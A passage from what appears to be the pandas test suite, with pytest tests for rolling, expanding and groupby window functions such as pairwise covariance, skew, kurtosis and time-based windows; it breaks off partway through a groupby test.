df2_result = f(df2)
tm.assert_frame_equal(df2_result, df2_expected)
except (ImportError):
# scipy needed for rolling_window
continue
def test_moment_functions_zero_length_pairwise(self):
df1 = DataFrame()
df1_expected = df1
df2 = DataFrame(columns=Index(['a'], name='foo'),
index=Index([], name='bar'))
df2['a'] = df2['a'].astype('float64')
df1_expected = DataFrame(
index=pd.MultiIndex.from_product([df1.index, df1.columns]),
columns=Index([]))
df2_expected = DataFrame(
index=pd.MultiIndex.from_product([df2.index, df2.columns],
names=['bar', 'foo']),
columns=Index(['a'], name='foo'),
dtype='float64')
functions = [lambda x: (x.expanding(min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.expanding(min_periods=5)
.corr(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=True)),
]
for f in functions:
df1_result = f(df1)
tm.assert_frame_equal(df1_result, df1_expected)
df2_result = f(df2)
tm.assert_frame_equal(df2_result, df2_expected)
def test_expanding_cov_pairwise_diff_length(self):
# GH 7512
df1 = DataFrame([[1, 5], [3, 2], [3, 9]],
columns=Index(['A', 'B'], name='foo'))
df1a = DataFrame([[1, 5], [3, 9]],
index=[0, 2],
columns=Index(['A', 'B'], name='foo'))
df2 = DataFrame([[5, 6], [None, None], [2, 1]],
columns=Index(['X', 'Y'], name='foo'))
df2a = DataFrame([[5, 6], [2, 1]],
index=[0, 2],
columns=Index(['X', 'Y'], name='foo'))
# TODO: xref gh-15826
# .loc is not preserving the names
        result1 = df1.expanding().cov(df2, pairwise=True).loc[2]
result2 = df1.expanding().cov(df2a, pairwise=True).loc[2]
result3 = df1a.expanding().cov(df2, pairwise=True).loc[2]
result4 = df1a.expanding().cov(df2a, pairwise=True).loc[2]
expected = DataFrame([[-3.0, -6.0], [-5.0, -10.0]],
columns=Index(['A', 'B'], name='foo'),
index=Index(['X', 'Y'], name='foo'))
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, expected)
tm.assert_frame_equal(result3, expected)
tm.assert_frame_equal(result4, expected)
def test_expanding_corr_pairwise_diff_length(self):
# GH 7512
df1 = DataFrame([[1, 2], [3, 2], [3, 4]],
columns=['A', 'B'],
index=Index(range(3), name='bar'))
df1a = DataFrame([[1, 2], [3, 4]],
index=Index([0, 2], name='bar'),
columns=['A', 'B'])
df2 = DataFrame([[5, 6], [None, None], [2, 1]],
columns=['X', 'Y'],
index=Index(range(3), name='bar'))
df2a = DataFrame([[5, 6], [2, 1]],
index=Index([0, 2], name='bar'),
columns=['X', 'Y'])
result1 = df1.expanding().corr(df2, pairwise=True).loc[2]
result2 = df1.expanding().corr(df2a, pairwise=True).loc[2]
result3 = df1a.expanding().corr(df2, pairwise=True).loc[2]
result4 = df1a.expanding().corr(df2a, pairwise=True).loc[2]
expected = DataFrame([[-1.0, -1.0], [-1.0, -1.0]],
columns=['A', 'B'],
index=Index(['X', 'Y']))
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, expected)
tm.assert_frame_equal(result3, expected)
tm.assert_frame_equal(result4, expected)
def test_rolling_skew_edge_cases(self):
all_nan = Series([np.NaN] * 5)
# yields all NaN (0 variance)
d = Series([1] * 5)
x = d.rolling(window=5).skew()
tm.assert_series_equal(all_nan, x)
# yields all NaN (window too small)
d = Series(np.random.randn(5))
x = d.rolling(window=2).skew()
tm.assert_series_equal(all_nan, x)
# yields [NaN, NaN, NaN, 0.177994, 1.548824]
d = Series([-1.50837035, -0.1297039, 0.19501095, 1.73508164, 0.41941401
])
expected = Series([np.NaN, np.NaN, np.NaN, 0.177994, 1.548824])
x = d.rolling(window=4).skew()
tm.assert_series_equal(expected, x)
def test_rolling_kurt_edge_cases(self):
all_nan = Series([np.NaN] * 5)
# yields all NaN (0 variance)
d = Series([1] * 5)
x = d.rolling(window=5).kurt()
tm.assert_series_equal(all_nan, x)
# yields all NaN (window too small)
d = Series(np.random.randn(5))
x = d.rolling(window=3).kurt()
tm.assert_series_equal(all_nan, x)
# yields [NaN, NaN, NaN, 1.224307, 2.671499]
d = Series([-1.50837035, -0.1297039, 0.19501095, 1.73508164, 0.41941401
])
expected = Series([np.NaN, np.NaN, np.NaN, 1.224307, 2.671499])
x = d.rolling(window=4).kurt()
tm.assert_series_equal(expected, x)
def test_rolling_skew_eq_value_fperr(self):
        # GH 18804: rolling skew of all-equal values should return NaN
a = Series([1.1] * 15).rolling(window=10).skew()
assert np.isnan(a).all()
def test_rolling_kurt_eq_value_fperr(self):
        # GH 18804: rolling kurt of all-equal values should return NaN
a = Series([1.1] * 15).rolling(window=10).kurt()
assert np.isnan(a).all()
@pytest.mark.parametrize('func,static_comp', [('sum', np.sum),
('mean', np.mean),
('max', np.max),
('min', np.min)],
ids=['sum', 'mean', 'max', 'min'])
def test_expanding_func(self, func, static_comp):
def expanding_func(x, min_periods=1, center=False, axis=0):
exp = x.expanding(min_periods=min_periods,
center=center, axis=axis)
return getattr(exp, func)()
self._check_expanding(expanding_func, static_comp, preserve_nan=False)
def test_expanding_apply(self, raw):
def expanding_mean(x, min_periods=1):
exp = x.expanding(min_periods=min_periods)
result = exp.apply(lambda x: x.mean(), raw=raw)
return result
# TODO(jreback), needed to add preserve_nan=False
# here to make this pass
self._check_expanding(expanding_mean, np.mean, preserve_nan=False)
ser = Series([])
tm.assert_series_equal(ser, ser.expanding().apply(
lambda x: x.mean(), raw=raw))
# GH 8080
s = Series([None, None, None])
result = s.expanding(min_periods=0).apply(lambda x: len(x), raw=raw)
expected = Series([1., 2., 3.])
tm.assert_series_equal(result, expected)
def _check_expanding(self, func, static_comp, has_min_periods=True,
has_time_rule=True, preserve_nan=True):
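        # helper: compare the expanding aggregate against a static
        # computation over the corresponding prefix, and exercise the
        # min_periods handling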
series_result = func(self.series)
assert isinstance(series_result, Series)
frame_result = func(self.frame)
assert isinstance(frame_result, DataFrame)
result = func(self.series)
tm.assert_almost_equal(result[10], static_comp(self.series[:11]))
if preserve_nan:
assert result.iloc[self._nan_locs].isna().all()
ser = Series(randn(50))
if has_min_periods:
result = func(ser, min_periods=30)
assert result[:29].isna().all()
tm.assert_almost_equal(result.iloc[-1], static_comp(ser[:50]))
# min_periods is working correctly
result = func(ser, min_periods=15)
assert isna(result.iloc[13])
assert notna(result.iloc[14])
ser2 = Series(randn(20))
result = func(ser2, min_periods=5)
assert isna(result[3])
assert notna(result[4])
# min_periods=0
result0 = func(ser, min_periods=0)
result1 = func(ser, min_periods=1)
tm.assert_almost_equal(result0, result1)
else:
result = func(ser)
tm.assert_almost_equal(result.iloc[-1], static_comp(ser[:50]))
def test_rolling_max_gh6297(self):
"""Replicate result expected in GH #6297"""
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 2 datapoints on one of the days
indices.append(datetime(1975, 1, 3, 6, 0))
series = Series(range(1, 7), index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
expected = Series([1.0, 2.0, 6.0, 4.0, 5.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').max().rolling(window=1).max()
tm.assert_series_equal(expected, x)
def test_rolling_max_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be max
expected = Series([0.0, 1.0, 2.0, 3.0, 20.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').max().rolling(window=1).max()
tm.assert_series_equal(expected, x)
# Now specify median (10.0)
expected = Series([0.0, 1.0, 2.0, 3.0, 10.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').median().rolling(window=1).max()
tm.assert_series_equal(expected, x)
# Now specify mean (4+10+20)/3
v = (4.0 + 10.0 + 20.0) / 3.0
expected = Series([0.0, 1.0, 2.0, 3.0, v],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').mean().rolling(window=1).max()
tm.assert_series_equal(expected, x)
def test_rolling_min_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be min
expected = Series([0.0, 1.0, 2.0, 3.0, 4.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
r = series.resample('D').min().rolling(window=1)
tm.assert_series_equal(expected, r.min())
def test_rolling_median_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be median
expected = Series([0.0, 1.0, 2.0, 3.0, 10],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').median().rolling(window=1).median()
tm.assert_series_equal(expected, x)
def test_rolling_median_memory_error(self):
# GH11722
n = 20000
Series(np.random.randn(n)).rolling(window=2, center=False).median()
Series(np.random.randn(n)).rolling(window=2, center=False).median()
def test_rolling_min_max_numeric_types(self):
# GH12373
types_test = [np.dtype("f{}".format(width)) for width in [4, 8]]
types_test.extend([np.dtype("{}{}".format(sign, width))
for width in [1, 2, 4, 8] for sign in "ui"])
for data_type in types_test:
# Just testing that these don't throw exceptions and that
# the return type is float64. Other tests will cover quantitative
# correctness
result = (DataFrame(np.arange(20, dtype=data_type))
.rolling(window=5).max())
assert result.dtypes[0] == np.dtype("f8")
result = (DataFrame(np.arange(20, dtype=data_type))
.rolling(window=5).min())
assert result.dtypes[0] == np.dtype("f8")
class TestGrouperGrouping(object):
def setup_method(self, method):
self.series = Series(np.arange(10))
self.frame = DataFrame({'A': [1] * 20 + [2] * 12 + [3] * 8,
'B': np.arange(40)})
def test_mutated(self):
def f():
self.frame.groupby('A', foo=1)
pytest.raises(TypeError, f)
g = self.frame.groupby('A')
assert not g.mutated
g = self.frame.groupby('A', mutated=True)
assert g.mutated
def test_getitem(self):
g = self.frame.groupby('A')
g_mutated = self.frame.groupby('A', mutated=True)
expected = g_mutated.B.apply(lambda x: x.rolling(2).mean())
result = g.rolling(2).mean().B
tm.assert_series_equal(result, expected)
result = g.rolling(2).B.mean()
tm.assert_series_equal(result, expected)
result = g.B.rolling(2).mean()
tm.assert_series_equal(result, expected)
result = self.frame.B.groupby(self.frame.A).rolling(2).mean()
tm.assert_series_equal(result, expected)
def test_getitem_multiple(self):
# GH 13174
g = self.frame.groupby('A')
r = g.rolling(2)
g_mutated = self.frame.groupby('A', mutated=True)
expected = g_mutated.B.apply(lambda x: x.rolling(2).count())
result = r.B.count()
tm.assert_series_equal(result, expected)
result = r.B.count()
tm.assert_series_equal(result, expected)
def test_rolling(self):
g = self.frame.groupby('A')
r = g.rolling(window=4)
for f in ['sum', 'mean', 'min', 'max', 'count', 'kurt', 'skew']:
result = getattr(r, f)()
expected = g.apply(lambda x: getattr(x.rolling(4), f)())
tm.assert_frame_equal(result, expected)
for f in ['std', 'var']:
result = getattr(r, f)(ddof=1)
expected = g.apply(lambda x: getattr(x.rolling(4), f)(ddof=1))
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = g.apply(lambda x: x.rolling(4).quantile(0.5))
tm.assert_frame_equal(result, expected)
def test_rolling_corr_cov(self):
g = self.frame.groupby('A')
r = g.rolling(window=4)
for f in ['corr', 'cov']:
result = getattr(r, f)(self.frame)
def func(x):
return getattr(x.rolling(4), f)(self.frame)
expected = g.apply(func)
tm.assert_frame_equal(result, expected)
result = getattr(r.B, f)(pairwise=True)
def func(x):
return getattr(x.B.rolling(4), f)(pairwise=True)
expected = g.apply(func)
tm.assert_series_equal(result, expected)
def test_rolling_apply(self, raw):
g = self.frame.groupby('A')
r = g.rolling(window=4)
# reduction
result = r.apply(lambda x: x.sum(), raw=raw)
expected = g.apply(
lambda x: x.rolling(4).apply(lambda y: y.sum(), raw=raw))
tm.assert_frame_equal(result, expected)
def test_rolling_apply_mutability(self):
# GH 14013
df = pd.DataFrame({'A': ['foo'] * 3 + ['bar'] * 3, 'B': [1] * 6})
g = df.groupby('A')
mi = pd.MultiIndex.from_tuples([('bar', 3), ('bar', 4), ('bar', 5),
('foo', 0), ('foo', 1), ('foo', 2)])
mi.names = ['A', None]
# Grouped column should not be a part of the output
expected = pd.DataFrame([np.nan, 2., 2.] * 2, columns=['B'], index=mi)
result = g.rolling(window=2).sum()
tm.assert_frame_equal(result, expected)
# Call an arbitrary function on the groupby
g.sum()
# Make sure nothing has been mutated
result = g.rolling(window=2).sum()
tm.assert_frame_equal(result, expected)
def test_expanding(self):
g = self.frame.groupby('A')
r = g.expanding()
for f in ['sum', 'mean', 'min', 'max', 'count', 'kurt', 'skew']:
result = getattr(r, f)()
expected = g.apply(lambda x: getattr(x.expanding(), f)())
tm.assert_frame_equal(result, expected)
for f in ['std', 'var']:
result = getattr(r, f)(ddof=0)
expected = g.apply(lambda x: getattr(x.expanding(), f)(ddof=0))
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = g.apply(lambda x: x.expanding().quantile(0.5))
tm.assert_frame_equal(result, expected)
def test_expanding_corr_cov(self):
g = self.frame.groupby('A')
r = g.expanding()
for f in ['corr', 'cov']:
result = getattr(r, f)(self.frame)
def func(x):
return getattr(x.expanding(), f)(self.frame)
expected = g.apply(func)
tm.assert_frame_equal(result, expected)
result = getattr(r.B, f)(pairwise=True)
def func(x):
return getattr(x.B.expanding(), f)(pairwise=True)
expected = g.apply(func)
tm.assert_series_equal(result, expected)
def test_expanding_apply(self, raw):
g = self.frame.groupby('A')
r = g.expanding()
# reduction
result = r.apply(lambda x: x.sum(), raw=raw)
expected = g.apply(
lambda x: x.expanding().apply(lambda y: y.sum(), raw=raw))
tm.assert_frame_equal(result, expected)
class TestRollingTS(object):
# rolling time-series friendly
# xref GH13327
def setup_method(self, method):
self.regular = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': range(5)}).set_index('A')
self.ragged = DataFrame({'B': range(5)})
self.ragged.index = [Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')]
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]},
index=[Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')])
df
df.rolling('2s').sum()
def test_valid(self):
df = self.regular
# not a valid freq
with pytest.raises(ValueError):
df.rolling(window='foobar')
# not a datetimelike index
with pytest.raises(ValueError):
df.reset_index().rolling(window='foobar')
# non-fixed freqs
for freq in ['2MS', pd.offsets.MonthBegin(2)]:
with pytest.raises(ValueError):
df.rolling(window=freq)
for freq in ['1D', pd.offsets.Day(2), '2ms']:
df.rolling(window=freq)
# non-integer min_periods
for minp in [1.0, 'foo', np.array([1, 2, 3])]:
with pytest.raises(ValueError):
df.rolling(window='1D', min_periods=minp)
# center is not implemented
with pytest.raises(NotImplementedError):
df.rolling(window='1D', center=True)
def test_on(self):
df = self.regular
# not a valid column
with pytest.raises(ValueError):
df.rolling(window='2s', on='foobar')
# column is valid
df = df.copy()
df['C'] = pd.date_range('20130101', periods=len(df))
df.rolling(window='2d', on='C').sum()
# invalid columns
with pytest.raises(ValueError):
df.rolling(window='2d', on='B')
# ok even though on non-selected
df.rolling(window='2d', on='C').B.sum()
def test_monotonic_on(self):
# on/index must be monotonic
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': range(5)})
assert df.A.is_monotonic
df.rolling('2s', on='A').sum()
df = df.set_index('A')
assert df.index.is_monotonic
df.rolling('2s').sum()
# non-monotonic
df.index = reversed(df.index.tolist())
assert not df.index.is_monotonic
with pytest.raises(ValueError):
df.rolling('2s').sum()
df = df.reset_index()
with pytest.raises(ValueError):
df.rolling('2s', on='A').sum()
def test_frame_on(self):
df = DataFrame({'B': range(5),
'C': pd.date_range('20130101 09:00:00',
periods=5,
freq='3s')})
df['A'] = [Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')]
        # we simulate using 'on' by comparing against an explicit set_index('A')
expected = (df.set_index('A')
.rolling('2s')
.B
.sum()
.reset_index(drop=True)
)
result = (df.rolling('2s', on='A')
.B
.sum()
)
tm.assert_series_equal(result, expected)
# test as a frame
        # the 'on' column should be ignored as an aggregation column
        # note that the expected result is built by setting the index,
        # computing, and then resetting it, so its columns have to be
        # reordered to match the actual result, which keeps the original
        # column order
expected = (df.set_index('A')
.rolling('2s')[['B']]
.sum()
.reset_index()[['B', 'A']]
)
result = (df.rolling('2s', on='A')[['B']]
.sum()
)
tm.assert_frame_equal(result, expected)
def test_frame_on2(self):
# using multiple aggregation columns
df = DataFrame({'A': [0, 1, 2, 3, 4],
'B': [0, 1, 2, np.nan, 4],
'C': Index([Timestamp('20130101 09:00:00'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:05'),
Timestamp('20130101 09:00:06')])},
columns=['A', 'C', 'B'])
expected1 = DataFrame({'A': [0., 1, 3, 3, 7],
'B': [0, 1, 3, np.nan, 4],
'C': df['C']},
columns=['A', 'C', 'B'])
result = df.rolling('2s', on='C').sum()
expected = expected1
tm.assert_frame_equal(result, expected)
expected = Series([0, 1, 3, np.nan, 4], name='B')
result = df.rolling('2s', on='C').B.sum()
tm.assert_series_equal(result, expected)
expected = expected1[['A', 'B', 'C']]
result = df.rolling('2s', on='C')[['A', 'B', 'C']].sum()
tm.assert_frame_equal(result, expected)
def test_basic_regular(self):
df = self.regular.copy()
df.index = pd.date_range('20130101', periods=5, freq='D')
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='1D').sum()
tm.assert_frame_equal(result, expected)
df.index = pd.date_range('20130101', periods=5, freq='2D')
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='2D', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(window=1, min_periods=1).sum()
result = df.rolling(window='2D', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(window=1).sum()
result = df.rolling(window='2D').sum()
tm.assert_frame_equal(result, expected)
def test_min_periods(self):
# compare for min_periods
df = self.regular
        # a fixed window of 2 and a '2s' offset window are equivalent here
expected = df.rolling(2, min_periods=1).sum()
result = df.rolling('2s').sum()
tm.assert_frame_equal(result, expected)
expected = df.rolling(2, min_periods=1).sum()
result = df.rolling('2s', min_periods=1).sum()
tm.assert_frame_equal(result, expected)
def test_closed(self):
# xref GH13965
df = DataFrame({'A': [1] * 5},
index=[Timestamp('20130101 09:00:01'),
Timestamp('20130101 09:00:02'),
Timestamp('20130101 09:00:03'),
Timestamp('20130101 09:00:04'),
Timestamp('20130101 09:00:06')])
# closed must be 'right', 'left', 'both', 'neither'
with pytest.raises(ValueError):
self.regular.rolling(window='2s', closed="blabla")
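        # for a '2s' offset window ending at time t the interval is
        # closed='right'   -> (t - 2s, t]   (the default)
        # closed='both'    -> [t - 2s, t]
        # closed='left'    -> [t - 2s, t)
        # closed='neither' -> (t - 2s, t)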
expected = df.copy()
expected["A"] = [1.0, 2, 2, 2, 1]
result = df.rolling('2s', closed='right').sum()
tm.assert_frame_equal(result, expected)
# default should be 'right'
result = df.rolling('2s').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [1.0, 2, 3, 3, 2]
result = df.rolling('2s', closed='both').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [np.nan, 1.0, 2, 2, 1]
result = df.rolling('2s', closed='left').sum()
tm.assert_frame_equal(result, expected)
expected = df.copy()
expected["A"] = [np.nan, 1.0, 1, 1, np.nan]
result = df.rolling('2s', closed='neither').sum()
tm.assert_frame_equal(result, expected)
def test_ragged_sum(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 3, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=2).sum()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 3, np.nan, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 5, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s').sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 5, 7]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='4s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 6, 9]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='4s', min_periods=3).sum()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 3, 6, 9]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).sum()
expected = df.copy()
expected['B'] = [0.0, 1, 3, 6, 10]
tm.assert_frame_equal(result, expected)
def test_ragged_mean(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).mean()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).mean()
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_median(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).median()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).median()
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_quantile(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).quantile(0.5)
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).quantile(0.5)
expected = df.copy()
expected['B'] = [0.0, 1, 1.5, 3.0, 3.5]
tm.assert_frame_equal(result, expected)
def test_ragged_std(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).std(ddof=0)
expected = df.copy()
expected['B'] = [0.0] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='1s', min_periods=1).std(ddof=1)
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).std(ddof=0)
expected = df.copy()
expected['B'] = [0.0] + [0.5] * 4
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).std(ddof=1)
expected = df.copy()
expected['B'] = [np.nan, 0.707107, 1.0, 1.0, 1.290994]
tm.assert_frame_equal(result, expected)
def test_ragged_var(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).var(ddof=0)
expected = df.copy()
expected['B'] = [0.0] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='1s', min_periods=1).var(ddof=1)
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='3s', min_periods=1).var(ddof=0)
expected = df.copy()
expected['B'] = [0.0] + [0.25] * 4
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).var(ddof=1)
expected = df.copy()
expected['B'] = [np.nan, 0.5, 1.0, 1.0, 1 + 2 / 3.]
tm.assert_frame_equal(result, expected)
def test_ragged_skew(self):
df = self.ragged
result = df.rolling(window='3s', min_periods=1).skew()
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).skew()
expected = df.copy()
expected['B'] = [np.nan] * 2 + [0.0, 0.0, 0.0]
tm.assert_frame_equal(result, expected)
def test_ragged_kurt(self):
df = self.ragged
result = df.rolling(window='3s', min_periods=1).kurt()
expected = df.copy()
expected['B'] = [np.nan] * 5
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).kurt()
expected = df.copy()
expected['B'] = [np.nan] * 4 + [-1.2]
tm.assert_frame_equal(result, expected)
def test_ragged_count(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).count()
expected = df.copy()
expected['B'] = [1.0, 1, 1, 1, 1]
tm.assert_frame_equal(result, expected)
df = self.ragged
result = df.rolling(window='1s').count()
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).count()
expected = df.copy()
expected['B'] = [1.0, 1, 2, 1, 2]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=2).count()
expected = df.copy()
expected['B'] = [np.nan, np.nan, 2, np.nan, 2]
tm.assert_frame_equal(result, expected)
def test_regular_min(self):
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': [0.0, 1, 2, 3, 4]}).set_index('A')
result = df.rolling('1s').min()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
df = DataFrame({'A': pd.date_range('20130101',
periods=5,
freq='s'),
'B': [5, 4, 3, 4, 5]}).set_index('A')
tm.assert_frame_equal(result, expected)
result = df.rolling('2s').min()
expected = df.copy()
expected['B'] = [5.0, 4, 3, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling('5s').min()
expected = df.copy()
expected['B'] = [5.0, 4, 3, 3, 3]
tm.assert_frame_equal(result, expected)
def test_ragged_min(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 1, 1, 3, 3]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).min()
expected = df.copy()
expected['B'] = [0.0, 0, 0, 1, 1]
tm.assert_frame_equal(result, expected)
def test_perf_min(self):
N = 10000
dfp = DataFrame({'B': np.random.randn(N)},
index=pd.date_range('20130101',
periods=N,
freq='s'))
expected = dfp.rolling(2, min_periods=1).min()
result = dfp.rolling('2s').min()
assert ((result - expected) < 0.01).all().bool()
expected = dfp.rolling(200, min_periods=1).min()
result = dfp.rolling('200s').min()
assert ((result - expected) < 0.01).all().bool()
def test_ragged_max(self):
df = self.ragged
result = df.rolling(window='1s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).max()
expected = df.copy()
expected['B'] = [0.0, 1, 2, 3, 4]
tm.assert_frame_equal(result, expected)
def test_ragged_apply(self, raw):
df = self.ragged
f = lambda x: 1
result = df.rolling(window='1s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
result = df.rolling(window='2s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
result = df.rolling(window='5s', min_periods=1).apply(f, raw=raw)
expected = df.copy()
expected['B'] = 1.
tm.assert_frame_equal(result, expected)
def test_all(self):
# simple comparison of integer vs time-based windowing
df = self.regular * 2
er = df.rolling(window=1)
r = df.rolling(window='1s')
for f in ['sum', 'mean', 'count', 'median', 'std',
'var', 'kurt', 'skew', 'min', 'max']:
result = getattr(r, f)()
expected = getattr(er, f)()
tm.assert_frame_equal(result, expected)
result = r.quantile(0.5)
expected = er.quantile(0.5)
tm.assert_frame_equal(result, expected)
def test_all_apply(self, raw):
df = self.regular * 2
er = df.rolling(window=1)
r = df.rolling(window='1s')
result = r.apply(lambda x: 1, raw=raw)
expected = er.apply(lambda x: 1, raw=raw)
tm.assert_frame_equal(result, expected)
def test_all2(self):
# more sophisticated comparison of integer vs.
# time-based windowing
df = DataFrame({'B': np.arange(50)},
index=pd.date_range('20130101',
periods=50, freq='H')
)
# in-range data
dft = df.between_time("09:00", "16:00")
r = dft.rolling(window='5H')
for f in ['sum', 'mean', 'count', 'median', 'std',
'var', 'kurt', 'skew', 'min', 'max']:
result = getattr(r, f)()
# we need to roll the days separately
# to compare with a time-based roll
# finally groupby-apply will return a multi-index
# so we need to drop the day
def agg_by_day(x):
x = x.between_time("09:00", "16:00")
return getattr(x.rolling(5, min_periods=1), f)()
expected = df.groupby(df.index.day).apply(
agg_by_day).reset_index(level=0, drop=True)
tm.assert_frame_equal(result, expected)
def test_groupby_monotonic(self):
# GH 15130
# we don't need to validate monotonicity when grouping
data = [
['David', '1/1/2015', 100], ['David', '1/5/2015', 500],
['David', '5/30/2015', 50], ['David', '7/25/2015', 50],
['Ryan', '1/4/2014', 100], ['Ryan', '1/19/2015', 500],
['Ryan', '3/31/2016', 50], ['Joe', '7/1/2015', 100],
